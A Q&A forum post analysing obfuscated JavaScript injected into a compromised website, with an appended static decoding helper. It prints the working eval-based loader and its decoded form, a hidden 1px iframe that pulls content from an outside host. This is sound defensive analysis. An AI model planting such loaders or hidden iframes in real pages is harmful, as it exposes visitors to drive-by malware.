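Malicious JavaScript was injected - what does it do?

Time: 2013-04-01 20:00:32

Tags: javascript

One of our websites recently had its FTP account compromised, and the attacker injected the following JavaScript into its home page HTML. I'm pretty good with JavaScript, but I can't make heads or tails of what this code actually does. Can anyone else here see what's going on?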

p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!66!71!7@!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!66!71!7@!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!6@!6e!65!6c!6f!76!65!72!67!75!6@!64!65!2e!63!6f!6d!2f!5f!76!74!6@!5f!62!6@!6e!2f!63!6f!75!6e!74!65!72!2e!70!68!70!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!66!71!7@!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!66!71!7@!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!66!71!7@!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!66!71!7@!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=12;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-484!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}

After changing e(s) to console.log, I get the following:

(function () {
    var fqy = document.createElement('iframe');

    fqy.src = 'http://wineloverguide.com/_vti_bin/counter.php';
    fqy.style.position = 'absolute';
    fqy.style.border = '0';
    fqy.style.height = '1px';
    fqy.style.width = '1px';
    fqy.style.left = '1px';
    fqy.style.top = '1px';

    if (!document.getElementById('fqy')) {
        document.write('<div id=\'fqy\'></div>');
        document.getElementById('fqy').appendChild(fqy);
    }
})();

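1 answer:

Answer 0: (score: 2)

If you look closely at the code, it is just a string of hexadecimal numbers that gets converted, character by character, into JavaScript code.

At one point in that code I see e=eval, and then at the end e(s). So if you change e(s) to console.log(s), you can see what this code is really doing.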

(function () {
    var fqy = document.createElement('iframe');

    fqy.src = 'http://wineloverguide.com/_vti_bin/counter.php';
    fqy.style.position = 'absolute';
    fqy.style.border = '0';
    fqy.style.height = '1px';
    fqy.style.width = '1px';
    fqy.style.left = '1px';
    fqy.style.top = '1px';

    if (!document.getElementById('fqy')) {
        document.write('<div id=\'fqy\'></div>');
        document.getElementById('fqy').appendChild(fqy);
    }
})();
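
The decoding step described in the answer can also be done statically, without running the injected script at all. The following is an added example, not part of the original question or answer: the function names, the report fields and the `example.invalid` sample are assumptions made for illustration, and the sample input is constructed rather than copied from the page.

```javascript
// Added example: static decoder for the "hex tokens + placeholder" encoding.
// Nothing is evaluated; the payload is only turned back into text and inspected.

// Undo the substitution (placeholder -> digit), split on the separator and
// map each hex token to its character. Rejects anything that is not 1-2 hex digits.
function decodeHexTokens(encoded, placeholder = "@", digit = "9", sep = "!") {
  return encoded
    .split(placeholder).join(digit)
    .split(sep)
    .filter((tok) => tok.length > 0)
    .map((tok) => {
      if (!/^[0-9a-f]{1,2}$/i.test(tok)) throw new Error("unexpected token: " + tok);
      return String.fromCharCode(parseInt(tok, 16));
    })
    .join("");
}

// Inverse of decodeHexTokens, used only to build the constructed sample below.
function encodeHexTokens(text, placeholder = "@", digit = "9", sep = "!") {
  return Array.from(text, (ch) => ch.charCodeAt(0).toString(16))
    .join(sep)
    .split(digit).join(placeholder);
}

// Pull out the facts a reviewer needs from the decoded text.
function triage(decoded) {
  return {
    urls: decoded.match(/https?:\/\/[^\s'"<>)]+/g) || [],
    createsIframe: /createElement\(\s*['"]iframe['"]\s*\)/.test(decoded),
    usesDocumentWrite: /document\.write\s*\(/.test(decoded),
    onePixel: /(height|width)\s*=\s*['"][01]px['"]/.test(decoded),
  };
}

// Constructed sample (not the payload from the page): same shape, placeholder host.
const SAMPLE_PLAIN =
  "var f = document.createElement('iframe');\r\n" +
  "f.src = 'http://example.invalid/counter.php';\r\n" +
  "f.style.width = '1px';";
const SAMPLE_ENCODED = encodeHexTokens(SAMPLE_PLAIN);

const report = triage(decodeHexTokens(SAMPLE_ENCODED));
console.log(report);
```

Passing the quoted string literal from an injected script to `decodeHexTokens` yields the same text that `console.log(s)` prints, and the URLs in the report can then be searched for in proxy and web server logs.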